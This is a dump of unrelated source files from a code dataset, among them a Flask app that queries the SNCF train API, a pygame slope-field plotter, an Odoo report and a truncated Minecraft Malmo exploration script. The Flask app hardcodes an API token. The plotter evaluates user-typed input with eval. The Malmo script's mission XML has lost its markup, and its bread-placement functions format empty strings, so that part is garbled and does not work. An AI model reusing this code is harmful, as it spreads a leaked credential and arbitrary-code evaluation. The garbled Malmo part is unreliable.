value=0 )\nspi = SPI( 1 )\nspi.init( polarity=0, phase=1 )\n\nlcd = SPI_LCD12864( spi=spi, cs=cs )\n# text at X=10, Y=25, colour=1 (stroke)\n#lcd.text( \"MicroPython !\", 10, 25, 1 )\n#lcd.update()\n\ndef color_transform( rgb ):\n\t# transform the clipreader (rgb) color to the target FrameBuffer color (2 colors)\n\treturn 0 if rgb==(0,0,0) else 1\n\nreader = open_image( 'mpy.pbm' )\nreader.clip(0,0,lcd.width,lcd.height)\n# Copy the clipped area TO a target FrameBuffer (lcd) at its starting\n# position 0,0 for the given clipping width,height .\nreader.copy_to(lcd, 0,0, color_transform )\nlcd.update()\n","sub_path":"FILEFORMAT/examples/testpbmlcd.py","file_name":"testpbmlcd.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"246887086","text":"class Box:\n def __init__(self, index):\n self.index = index\n self.children = []\n\n def count(self, used):\n if not used.get(self.index, False):\n used[self.index] = True\n local_count = 1\n for child in self.children:\n local_count += child.count(used)\n return local_count\n return 0\n\n def __repr__(self):\n children = [x.index for x in self.children]\n return \"(index={},children={})\".format(self.index, children)\n\n\ndef boxes():\n num_boxes = int(input())\n boxes = {}\n for i in range(num_boxes):\n boxes[i+1] = Box(i+1)\n\n for i,index in enumerate([int(x) for x in input().split(\" \")]):\n if index != 0:\n boxes[index].children.append(boxes.get(i+1))\n\n num_queries = int(input())\n for i in range(num_queries):\n used = {}\n nums = [int(x) for x in input().split(\" \")[1:]]\n curr_boxes = [boxes[x] for x in nums]\n num_boxes = [x.count(used) for x in curr_boxes]\n print(sum(num_boxes))\n\nboxes()\n\n","sub_path":"boxes/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146767737","text":"from collections import defaultdict\nfrom math import ceil\n\ndef parse_substance(s):\n amount, chemical = s.split()\n return chemical, int(amount)\n\n\ndef parse_reaction(reaction):\n source, result = reaction.split(' => ')\n output, num_units = parse_substance(result)\n ingredients = dict(parse_substance(s) for s in source.split(', '))\n return (output, (num_units, ingredients))\n\n\ndef parse_input(s):\n return dict(parse_reaction(line) for line in s.splitlines())\n\nwith open('./inputs/day14') as f:\n reactions = parse_input(f.read())\n\ndef calculate_components(chemical, amount, wastes):\n quantity, ingredients = reactions[chemical]\n multiples = ceil(amount / quantity)\n\n wastes[chemical] += multiples * quantity - amount\n\n components_needed = dict()\n for chemical, amount in ingredients.items():\n total_amount_needed = amount * multiples\n usable_waste = min(total_amount_needed, wastes[chemical])\n total_amount_needed -= usable_waste\n wastes[chemical] -= usable_waste\n components_needed[chemical] = total_amount_needed\n\n return components_needed\n\n\ndef calculate_needed_ore(fuel):\n substances_needed = defaultdict(int)\n substances_needed['FUEL'] = fuel\n\n wastes = defaultdict(int)\n\n total_ore = 0\n while substances_needed:\n chemical, amount = substances_needed.popitem()\n\n components_needed = calculate_components(chemical, amount, wastes)\n if 'ORE' in components_needed:\n total_ore += components_needed.pop('ORE')\n\n for chemical, amount in components_needed.items():\n substances_needed[chemical] += amount\n\n return 
total_ore\n\ndef binary_search(start, end, fun):\n while end - start > 1:\n middle = start + (end - start) // 2\n if fun(middle) == -1:\n end = middle\n else:\n start = middle\n return start\n\nprint(f'First solution {calculate_needed_ore(1)}')\nprint(f'Second soultion {int(binary_search(0, 1e12, lambda fuel: -1 if calculate_needed_ore(fuel) > 1e12 else 1))}')\n","sub_path":"day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"65971709","text":"Price = {\n \"HP\": 600,\n \"DELL\": 650,\n \"MACBOOK\": 12000,\n \"ASUS\": 400,\n \"ACER\": 350,\n \"TOSHIBA\": 600,\n \"FUJITSU\": 900,\n \"ALIENWARE\": 1000\n}\nKho = {\n \"HP\": 20 ,\n \"DELL\": 50,\n \"MACBOOK\": 12,\n \"ASUS\": 30,\n \"ACER\": 10,\n \"TOSHIBA\": 90,\n \"FUJITSU\": 80,\n \"ALIENWARE\": 15\n}\nprint('Gia tri 5 máy ASUS: ',5*Price['ASUS'] )\na = input(\" Nhập máy bạn muốn mua: \")\nb = input(\" Nhập số lượng máy đó: \")\nprint(\"Giá trị \",b,\"máy \" , a ,\"la: \", int(b)*Price[a])\nKho[a] = Kho[a] - int(b)\nprint(Kho)\n","sub_path":"Buoi5/HomeWork/Part5.py","file_name":"Part5.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516158953","text":"# -*- coding: utf-8 -*-\nfrom openerp.addons.report_xls.report_xls import report_xls\nfrom salesman_summary_parser import sm_report_parser\nimport xlwt\nimport time\nimport datetime\n\n\n\nclass sm_xls(report_xls):\n def generate_xls_report(self, _p, _xs, data, objects, wb):\n ws = wb.add_sheet(_p.report_name[:31])\n ws.panes_frozen = True\n ws.remove_splits = True\n ws.portrait = 1\n ws.fit_width_to_pages = 1\n row_pos = 0\n ws.set_horz_split_pos(row_pos)\n row_pos += 1\n ws.header_str = self.xls_headers['standard']\n ws.footer_str = self.xls_footers['standard']\n _xs.update({\n 'xls_title': 'font: bold true, height 350;'\n })\n _myxs = {'borders': 'borders: ' 'top thin, bottom thin',\n 'top_bottom_lined': 'borders: ' 'top medium, bottom thin',\n }\n cell_right_bold = xlwt.easyxf(_xs['right'] + _xs['bold'], num_format_str=report_xls.decimal_format)\n cell_center_bold_no = xlwt.easyxf(_xs['center'] + _xs['bold'])\n cell_center_bold = xlwt.easyxf(_xs['center'] + _xs['bold']+ _myxs['top_bottom_lined'])\n cell_style = xlwt.easyxf(_xs['xls_title']+_xs['center'])\n cell_center = xlwt.easyxf(_xs['center'])\n cell_right = xlwt.easyxf(_xs['right'], num_format_str=report_xls.decimal_format)\n cell_left_b = xlwt.easyxf(_xs['left']+_xs['bold'])\n report_name =_p.report_name\n c_specs = [('report_name', 8, 0, 'text', report_name)]\n row_data = self.xls_row_template(c_specs, ['report_name'])\n row_pos = self.xls_write_row(ws, row_pos, row_data, row_style=cell_style)\n ws.row(row_pos-1).height_mismatch = True\n ws.row(row_pos-1).height = 220*2\n row_pos += 1\n get_line = _p.get_lines_1(objects, data)\n top2 = [('entry1', 3, 0, 'text', str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M %p\"))),\n ('entry2', 3, 0, 'text', get_line['company'])]\n row_data = self.xls_row_template(top2, [x[0] for x in top2])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_left_b)\n row_pos += 1\n\n top3 = [('entry1', 8, 0, 'text', \"Aging Report\")]\n row_data = self.xls_row_template(top3, [x[0] for x in top3])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n row_pos += 2\n\n top4 = [('entry1', 2, 0, 'text', \"Chart of Account\"),\n ('entry2', 2, 0, 'text', 
\"Financial Year\"),\n ('entry3', 2, 0, 'text', \"Date\"),\n ('entry4', 2, 0, 'text', \"Period Length(Days)\")]\n row_data = self.xls_row_template(top4, [x[0] for x in top4])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n\n top6 = [('entry1', 2, 0, 'text', get_line['one']),\n ('entry2', 2, 0, 'text', get_line['financial_year']),\n ('entry3', 2, 0, 'text', data['form']['date_from']),\n ('entry4', 2, 0, 'text', data['form']['period_length'])]\n row_data = self.xls_row_template(top6, [x[0] for x in top6])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center)\n\n top5 = [('entry1', 2, 0, 'text', \"Partner's\"),\n ('entry2', 2, 0, 'text', \"Analysis Direction\"),\n ('entry3', 2, 0, 'text', \"Target Move\"),\n ('entry4', 2, 0, 'text', \"Currency\")]\n row_data = self.xls_row_template(top5, [x[0] for x in top5])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold_no)\n\n top7 = [('entry1', 2, 0, 'text', get_line['result_selection']),\n ('entry2', 2, 0, 'text', data['form']['direction_selection']),\n ('entry3', 2, 0, 'text', data['form']['target_move']),\n ('entry4', 2, 0, 'text', get_line['symbol'])]\n row_data = self.xls_row_template(top7, [x[0] for x in top7])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center)\n row_pos += 1\n top8 = [('entry1', 2, 0, 'text', \"Sales Person\"),\n ('entry2', 1, 0, 'text', \"Not due\"),\n ('entry3', 1, 0, 'text', data['form']['4']['name']),\n ('entry4', 1, 0, 'text', data['form']['3']['name']),\n ('entry5', 1, 0, 'text', data['form']['2']['name']),\n ('entry6', 1, 0, 'text', data['form']['1']['name']),\n ('entry7', 1, 0, 'text', data['form']['0']['name']),\n ('entry8', 1, 0, 'text', \"Total\")]\n row_data = self.xls_row_template(top8, [x[0] for x in top8])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold)\n\n form = data['form']\n fun_2_getline = _p.get_lines_abroad(form, objects, data)\n get_direction = _p.get_direction(6)\n get_for_period_4 = _p.get_for_period(4)\n get_for_period_3 = _p.get_for_period(3)\n get_for_period_2 = _p.get_for_period(2)\n get_for_period_1 = _p.get_for_period(1)\n get_for_period_0 = _p.get_for_period(0)\n get_for_period_5 = _p.get_for_period(5)\n if fun_2_getline:\n currency_symbol= [('entry1', 2, 0, 'text', \"Account Total\", None, cell_left_b),\n ('entry2', 1, 0, 'text', str(get_direction)+get_line['symbol']),\n ('entry3', 1, 0, 'text', str(get_for_period_4)+get_line['symbol']),\n ('entry4', 1, 0, 'text', str(get_for_period_3)+get_line['symbol']),\n ('entry5', 1, 0, 'text', str(get_for_period_2)+get_line['symbol']),\n ('entry6', 1, 0, 'text', str(get_for_period_1)+get_line['symbol']),\n ('entry7', 1, 0, 'text', str(get_for_period_0)+get_line['symbol']),\n ('entry8', 1, 0, 'text', str(get_for_period_5)+get_line['symbol'])]\n row_data = self.xls_row_template(currency_symbol, [x[0] for x in currency_symbol])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_center_bold)\n\n sales_persn_list = []\n sep_inv_by_partner = _p.get_sep_inv_by_partner(form, objects, data)\n needed = sep_inv_by_partner\n\n for i in needed:\n if i['sales_person'] not in sales_persn_list:\n sales_persn_list.append(i['sales_person'])\n dict_1 = {}\n for sp in sales_persn_list:\n dict_1[sp] = {'no_due': 0, '4': 0, '3': 0, '2': 0, '1': 0, '0': 0, 'total': 0}\n for n in needed:\n if n['sales_person'] == sp:\n dict_1[sp] = {'no_due': dict_1[sp]['no_due'] + n['no_due'], '4': dict_1[sp]['4'] + n['4'], '3': dict_1[sp]['3'] + n['3'], '2': dict_1[sp]['2'] + n['2'], 
'1': dict_1[sp]['1'] + n['1'], '0': dict_1[sp]['0'] + n['0'], 'total': dict_1[sp]['0'] + n['0'] + dict_1[sp]['1'] + n['1'] + dict_1[sp]['2'] + n['2'] + dict_1[sp]['3'] + n['3'] + dict_1[sp]['4'] + n['4']+dict_1[sp]['no_due'] + n['no_due']}\n\n for line in dict_1.keys():\n if line == \" \":\n patner_det = [('entry1', 2, 0, 'text', \"Unknown\", None, cell_left_b),\n ('entry2', 1, 0, 'number', dict_1[line]['no_due']),\n ('entry3', 1, 0, 'number', dict_1[line]['4']),\n ('entry4', 1, 0, 'number', dict_1[line]['3']),\n ('entry6', 1, 0, 'number', dict_1[line]['2']),\n ('entry7', 1, 0, 'number', dict_1[line]['1']),\n ('entry9', 1, 0, 'number', dict_1[line]['0']),\n ('entry10', 1, 0, 'number', dict_1[line]['total'], None, cell_right_bold)]\n row_data = self.xls_row_template(patner_det, [x[0] for x in patner_det])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_right)\n else:\n patner_det = [('entry1', 2, 0, 'text', line, None, cell_left_b),\n ('entry2', 1, 0, 'number', dict_1[line]['no_due']),\n ('entry3', 1, 0, 'number', dict_1[line]['4']),\n ('entry4', 1, 0, 'number', dict_1[line]['3']),\n ('entry6', 1, 0, 'number', dict_1[line]['2']),\n ('entry7', 1, 0, 'number', dict_1[line]['1']),\n ('entry9', 1, 0, 'number', dict_1[line]['0']),\n ('entry10', 1, 0, 'number', dict_1[line]['total'], None, cell_right_bold)]\n row_data = self.xls_row_template(patner_det, [x[0] for x in patner_det])\n row_pos = self.xls_write_row(ws, row_pos, row_data, cell_right)\nsm_xls('report.sm_report_xls.report_xls', 'account.move', parser=sm_report_parser)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"brothers/partner_aging_xls/report/salesman_summary_xls.py","file_name":"salesman_summary_xls.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52959878","text":"import pygame\r\nimport math\r\n\r\n\r\nclass MathFun:\r\n def __init__(self, InStr, NumParams = 2):\r\n self.Str = InStr\r\n self.Exc = compile(InStr, \"\", \"eval\")\r\n self.NumParams = NumParams\r\n def Eval(self, *Args):\r\n try:\r\n if self.NumParams == 2:\r\n x, y = Args[0], Args[1]\r\n return eval(self.Exc)\r\n elif self.NumParams == 1:\r\n x = Args[0]\r\n return eval(self.Exc)\r\n except:\r\n return None\r\nclass Integral:\r\n def __init__(self, Func):\r\n self.Func = Func\r\n def EvalLeft(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n while x < x1:\r\n Rtn += eval(self.Func.Exc) * step\r\n x += step\r\n return Rtn\r\n def EvalRight(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n while x < x1:\r\n x += step\r\n Rtn += eval(self.Func.Exc) * step\r\n return Rtn\r\n def EvalTrap(self, x0, x1, step):\r\n Rtn = 0\r\n x = x0\r\n Prev = eval(self.Func.Exc) / .5\r\n x += step\r\n while x < x1:\r\n Mid = eval(self.Func.Exc) / .5\r\n Rtn += (Prev + Mid) * step\r\n Prev = Mid\r\n x += step\r\n return Rtn\r\ndef ln(x):\r\n return math.log1p(x-1)\r\ndef logbase(b, x):\r\n return math.log(x, b)\r\ndef GetLenX(Len, Slope):\r\n return (float(Len ** 2) / ((Slope ** 2) + 1)) ** .5\r\npi = math.pi\r\nsin = math.sin\r\ncos = math.cos\r\ntan = math.tan\r\narcsin = math.asin\r\narccos = math.acos\r\narctan = math.atan\r\nlog = math.log10\r\ne = math.e\r\nLnColor = (255, 255, 255)\r\nScale = .08\r\nScaleInt = .01\r\nLnW = 1\r\ndef DrawLn(x, y, Slope, Surf, Len, Col):\r\n AbsX = GetLenX(Len / 2, Slope)\r\n AbsY = (Len / 2) ** 2 - AbsX ** 2\r\n AbsX1 = x - AbsX\r\n AbsX2 = x + AbsX\r\n AbsY1 = y + AbsY\r\n AbsY2 = y - AbsY\r\n AbsX1 += 
Base[0]\r\n AbsX2 += Base[0]\r\n AbsY1 += Base[1]\r\n AbsY2 += Base[1]\r\n pygame.draw.line(Surf, Col, (AbsX1, AbsY1), (AbsX2, AbsY2), LnW)\r\nColGrid = [(0, 0, 255), (255, 0, 255), (255, 255, 255), (0, 255, 255), (255, 0, 0)]\r\ndef DrawGrid(Surf, Func, Width, Height, Spacing):\r\n for y in xrange(-Height / 2, Height / 2, Spacing):\r\n for x in xrange(-Width / 2, Width / 2, Spacing):\r\n Slope = Func.Eval(float(Scale * x) / Spacing + FunOff[0], -(float(Scale * y) / Spacing + FunOff[1]))\r\n if Slope != None:\r\n Quadrant = 0\r\n x1 = float(Scale * x) / Spacing + FunOff[0]\r\n y1 = float(Scale * y) / Spacing + FunOff[1]\r\n if x1 < 0 and y1 <= 0:\r\n Quadrant = 1\r\n elif x1 > 0 and y1 > 0:\r\n Quadrant = 3\r\n elif x1 <= 0 and y1 > 0:\r\n Quadrant = 2\r\n DrawLn(x, y, Slope, Surf, Spacing, ColGrid[Quadrant])\r\npygame.display.init()\r\npygame.font.init()\r\nMonW = pygame.display.Info().current_w\r\nMonH = pygame.display.Info().current_h\r\nOrigW = 1280\r\nOrigH = 700\r\nSurface = pygame.display.set_mode((OrigW, OrigH))\r\nFunOff = (0, 0)\r\nCurrFun = None\r\nDragOn = False\r\nSpacer = 8\r\nCurrW, CurrH = Surface.get_size()\r\nBase = (CurrW/2, CurrH/2)\r\nIsFullscr = False\r\n\r\nwhile True:\r\n Evt = pygame.event.wait()\r\n if Evt.type == pygame.QUIT:\r\n break\r\n elif Evt.type == pygame.MOUSEBUTTONDOWN:\r\n if Evt.button == 5:\r\n Scale += ScaleInt\r\n elif Evt.button == 4 and Scale >= ScaleInt:\r\n Scale -= ScaleInt\r\n elif Evt.button == 1:\r\n DragOn = True\r\n if CurrFun != None:\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.type == pygame.MOUSEBUTTONUP:\r\n if Evt.button == 1:\r\n DragOn = False\r\n elif Evt.type == pygame.MOUSEMOTION:\r\n if DragOn and CurrFun != None:\r\n FunOff = (FunOff[0] - (Evt.rel[0] * Scale) / Spacer), (FunOff[1] - (Evt.rel[1] * Scale) / Spacer)\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.type == pygame.KEYDOWN:\r\n if Evt.key == pygame.K_RETURN:\r\n CurrFun = MathFun(raw_input(\"give me function of x and y: \"))\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.key == pygame.K_c:\r\n if CurrFun != None:\r\n FunOff = (0, 0)\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\n elif Evt.key == pygame.K_F11:\r\n IsFullscr = not IsFullscr\r\n if IsFullscr: Surface = pygame.display.set_mode((MonW, MonH), pygame.FULLSCREEN)\r\n else: Surface = pygame.display.set_mode((OrigW, OrigH))\r\n CurrW, CurrH = Surface.get_size()\r\n Base = (CurrW / 2, CurrH / 2)\r\n if CurrFun != None:\r\n Surface.fill((0,0,0))\r\n DrawGrid(Surface, CurrFun, CurrW, CurrH, Spacer)\r\n pygame.display.update()\r\npygame.quit()\r\n","sub_path":"SlopeField.py","file_name":"SlopeField.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"119922512","text":"import math\r\n\r\nclass QuadraticEquation(object):\r\n def __init__(self, data):\r\n self.a = data['a']\r\n self.b = data['b']\r\n self.c = data['c']\r\n \r\n def get_discr(self):\r\n self.d = self.b ** 2 - 4 * self.a * self.c\r\n return self.d\r\n \r\n def get_eq_root(self, order=1):\r\n # quadratic formula: the whole numerator is divided by 2a\r\n if order==1:\r\n x = (-self.b + self.d ** (1/2.0)) / (2 * self.a)\r\n else:\r\n x = (-self.b - self.d ** (1/2.0)) / (2 * self.a)\r\n return 
x\r\n","sub_path":"quadratic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137471102","text":"# -*- coding: utf-8 -*-\r\nfrom zeep import Client\r\nfrom flask import Flask, request, render_template\r\n\r\n#import keyring\r\nimport requests\r\nfrom datetime import datetime, date, time\r\n \r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"Accueil.html\")\r\n\r\n@app.route('/formCalcul')\r\ndef formCalcul():\r\n listgare = List_Gare()\r\n return render_template(\"formCalcul.html\", listgare=listgare)\r\n\r\n@app.route('/formCalculsimple')\r\ndef formCalculsimple():\r\n return render_template(\"formCalculsimple.html\")\r\n\r\n@app.route('/Calculsimple', methods=['GET','POST'])\r\ndef Calculsimple():\r\n if request.method == 'POST':\r\n result = request.form\r\n town1 = result['town1']\r\n town2 = result['town2']\r\n daydepart = result['daydepart']\r\n timedepart = result['timedepart']\r\n devise = result['devise']\r\n \r\n uic1 = Get_UIC(town1)\r\n uic2 = Get_UIC(town2)\r\n \r\n distance = Calcul_distance(town1,town2)\r\n \r\n http_rest=\"http://trouve-ton-train-rest.herokuapp.com/CalculPrix\"\r\n response = requests.get( http_rest, params = {'distance' : float(distance), 'devise' : devise })\r\n prixtrajet = response.json()\r\n \r\n departure=daydepart+\" \"+timedepart\r\n dt = datetime.strptime(departure, \"%Y-%m-%d %H:%M\")\r\n datetimesncf = convert_time(dt)\r\n \r\n nexttrain = Next_train(uic1,uic2,datetimesncf)\r\n\r\n return render_template(\"result.html\", town1=town1, town2=town2, result=round(distance,2), prix=round(prixtrajet['prix'],2), devise=devise, tableau=nexttrain)\r\n \r\n@app.route('/Calcul', methods=['GET','POST'])\r\ndef Calcul():\r\n if request.method == 'POST':\r\n result = request.form\r\n uic1 = result['town1']\r\n uic2 = result['town2']\r\n daydepart = result['daydepart']\r\n timedepart = result['timedepart']\r\n devise = result['devise']\r\n \r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n url1=\"https://api.sncf.com/v1/coverage/sncf/stop_areas/\"+uic1\r\n url2=\"https://api.sncf.com/v1/coverage/sncf/stop_areas/\"+uic2\r\n api1 = requests.get(url1, auth=(token_auth, '')).json()\r\n api2 = requests.get(url2, auth=(token_auth, '')).json()\r\n name1 = api1['stop_areas'][0]['administrative_regions'][0]['name']\r\n name2 = api2['stop_areas'][0]['administrative_regions'][0]['name']\r\n lat1 = api1['stop_areas'][0]['administrative_regions'][0]['coord']['lat']\r\n lon1 = api1['stop_areas'][0]['administrative_regions'][0]['coord']['lon']\r\n lat2 = api2['stop_areas'][0]['administrative_regions'][0]['coord']['lat']\r\n lon2 = api2['stop_areas'][0]['administrative_regions'][0]['coord']['lon']\r\n \r\n distance = Calcul_distance_uic(lon1, lon2, lat1, lat2)\r\n \r\n http_rest=\"http://trouve-ton-train-rest.herokuapp.com/CalculPrix\"\r\n response = requests.get( http_rest, params = {'distance' : float(distance), 'devise' : devise })\r\n prixtrajet = response.json()\r\n \r\n departure=daydepart+\" \"+timedepart\r\n dt = datetime.strptime(departure, \"%Y-%m-%d %H:%M\")\r\n datetimesncf = convert_time(dt)\r\n \r\n nexttrain = Next_train(uic1,uic2,datetimesncf)\r\n\r\n return render_template(\"result.html\", town1=name1, town2=name2, result=round(distance,2), prix=round(prixtrajet['prix'],2), devise=devise, tableau=nexttrain)\r\n\r\ndef List_Gare() :\r\n page_initiale = page_gares(0)\r\n 
item_per_page = page_initiale.json()['pagination']['items_per_page']\r\n total_items = page_initiale.json()['pagination']['total_result']\r\n\r\n new_dict=dict()\r\n \r\n for page in range(int(total_items/item_per_page)+1) :\r\n stations_page = page_gares(page)\r\n \r\n ensemble_stations = stations_page.json()\r\n \r\n if 'stop_areas' not in ensemble_stations:\r\n # no stop areas on this page\r\n continue\r\n \r\n # keep only the information we are interested in\r\n for station in ensemble_stations['stop_areas']:\r\n \r\n if 'administrative_regions' in station.keys() :\r\n #dfs.append(station['administrative_regions'][0]['name'])\r\n name = station['administrative_regions'][0]['name']\r\n uid = station['id']\t\r\n new_dict[name] = uid\r\n \r\n return(new_dict)\r\n \r\n \r\ndef page_gares(numero_page) :\r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n return requests.get(('https://api.sncf.com/v1/coverage/sncf/stop_areas?start_page={}').format(numero_page),auth=(token_auth, ''))\r\n \r\ndef Calcul_distance(town1,town2) :\r\n url_town1 = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town1+'\"'\r\n url_town2 = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town2+'\"'\r\n print(url_town2)\r\n api_town1 = requests.get(url_town1).json()\r\n api_town2 = requests.get(url_town2).json()\r\n print(api_town2)\r\n lat_town1 = api_town1['records'][0]['fields']['wgs_84'][0]\r\n long_town1 = api_town1['records'][0]['fields']['wgs_84'][1]\r\n \r\n lat_town2 = api_town2['records'][0]['fields']['wgs_84'][0]\r\n long_town2 = api_town2['records'][0]['fields']['wgs_84'][1]\r\n \r\n client = Client('https://trouve-ton-train-java-soap.herokuapp.com/services/TchouTchou?wsdl')\r\n result = client.service.calculDistance(long_town1, long_town2, lat_town1, lat_town2)\r\n return(result)\r\n \r\ndef Calcul_distance_uic(long_town1, long_town2, lat_town1, lat_town2) :\r\n client = Client('https://trouve-ton-train-java-soap.herokuapp.com/services/TchouTchou?wsdl')\r\n result = client.service.calculDistance(long_town1, long_town2, lat_town1, lat_town2)\r\n return(result)\r\n \r\ndef Get_UIC(town):\r\n url_town = 'https://data.sncf.com/api/records/1.0/search/?dataset=referentiel-gares-voyageurs&q=\"' + town+'\"'\r\n api_town = requests.get(url_town).json()\r\n UIC = api_town['records'][0]['fields']['pltf_uic_code']\r\n #uic = 'stop_area:OCE:SA:'+str(UIC)\r\n return(UIC) \r\n\r\ndef Next_train(UIC1,UIC2,datetimesncf) :\r\n\r\n token_auth = '5e044075-940e-4989-87ba-202e60af9e75'\r\n payload = {'from': str(UIC1), 'to': str(UIC2), 'min_nb_journeys': 5, 'datetime': datetimesncf}\r\n api_get_train = requests.get('https://api.sncf.com/v1/coverage/sncf/journeys?', params=payload, auth=(token_auth, '')).json()\r\n\r\n tabdeparttrain = []\r\n if 'error' in api_get_train:\r\n tabdeparttrain.append(\"No train found or available\")\r\n else:\r\n tabtrain = []\r\n n = len(api_get_train['journeys'])\r\n if n > 0:\r\n for i in range(0, n):\r\n tabtrain.append(api_get_train['journeys'][i]['departure_date_time'])\r\n \r\n u=0\r\n for train in tabtrain:\r\n u = u+1\r\n deptrain = convertir_str(train)\r\n tabdeparttrain.append(\"Train number \"+str(u)+\", departure at: \"+str(deptrain))\r\n \r\n return(tabdeparttrain)\r\n\r\ndef convert_time(dt) :\r\n ''' convert a datetime into a character string'''\r\n return datetime.strftime(dt, '%Y%m%dT%H%M%S')\r\n\r\ndef convertir_str(chaine) :\r\n ''' convert into a date the string returned by the 
API'''\r\n return datetime.strptime(chaine.replace('T',''),'%Y%m%d%H%M%S')\r\n \r\n#app.run(debug='true')","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"27904489","text":"from __future__ import print_function\nfrom __future__ import division\nfrom builtins import range\nimport MalmoPython\nimport os\nimport os.path\nimport sys\nimport time\nimport json\nimport pickle\nimport time\nimport numpy as np\nfrom gep import GEP\nfrom nn_policy import Simple_NN\nimport matplotlib.pyplot as plt\nfrom plot_utils import *\nimport collections\nfrom collections import OrderedDict\nfrom gep_utils import *\nfrom malmo_controller import MalmoController\n\n\nif sys.version_info[0] == 2:\n sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0) # flush print output immediately\nelse:\n import functools\n print = functools.partial(print, flush=True)\n\n\n\n\n############################# ENVIRONMENT INIT #####################################\ntick_lengths = 12\n #20 works\nskip_step = 1 #if = 0 then default 20 actions/sec\ndesired_mission_time = 7\ntotal_allowed_actions = 10 * desired_mission_time #dependent of skip_step, works if =1\n# if overclocking set display refresh rate to 1\nmod_setting = '' if tick_lengths >= 25 else \"true\"\n\nbread_positions = [[293.5,4,436.5],[289.5,4,437.5],[289.5,4,440.5],[291.5,6,442.5],[294.5,6,443.5]]\n\ndef draw_bread(): # place bread at given positions\n xml_string = \"\"\n for x,y,z in bread_positions:\n xml_string += '' % (int(x),int(y),int(z))\n xml_string += '\\n'\n return xml_string\n\ndef clean_bread(): # erase previous items in defined bread positions\n xml_string = \"\"\n for x,y,z in bread_positions:\n xml_string += '' % (int(x),int(y),int(z))\n return xml_string\n\nmissionXML='''\n \n \n \n Goal Exploration Process, in Malmo !\n \n\n \n ''' + str(tick_lengths) + '''\n ''' + mod_setting +'''\n \n \n \n \n clear\n \n \n \n \n \n \n \n \n\n ''' + clean_bread() + '''\n\n \n \n \n \n \n \n\n ''' + draw_bread() + '''\n\n \n \n \n \n \n \n FlowersBot\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 40\n 30\n \n \n\n \n '''\n\n#####################################################\n\ndef get_state(obs):\n breads = np.ones(len(bread_positions))\n for e in obs['entities']:\n if e['name'] == 'MinecartRideable':\n cart_x, cart_y, cart_z = e['x'], e['y'], e['z']\n cart_vx, cart_vy, cart_vz = e['motionX'], e['motionY'], e['motionZ']\n if e['name'] == 'FlowersBot':\n agent_x, agent_y, agent_z, agent_yaw = e['x'], e['y'], e['z'], (e['yaw'] % 360)\n agent_vx, agent_vy, agent_vz = e['motionX'], e['motionY'], e['motionZ']\n if e['name'] == 'bread':\n pos = [e['x'],e['y'],e['z']]\n bread_idx = bread_positions.index(pos) # current bread must be one of the positioned bread\n breads[bread_idx] = 0 #if bread is in arena it's not in our agent's pocket, so 0\n\n # ORDER MUST BE LIKE DEFINED INPUT_NAMES\n return np.array([agent_x, agent_y, agent_z, agent_vx, agent_vy, agent_vz, cart_x, cart_vx] + breads.tolist())\n\ndef get_outcome(state):\n s = state.tolist()\n # in case state and outcome are not ordered the same way\n # ORDER MUST BE LIKE DEFINED GET STATE TODO FIX\n return np.array(s[0:3] + [s[6]] + [sum(s[-len(bread_positions):])])\n\ndef save_gep(gep, iteration, book_keeping, savefile_name, book_keeping_name):\n with open(savefile_name, 'wb') as handle:\n pickle.dump([gep, iteration], handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(book_keeping_name, 
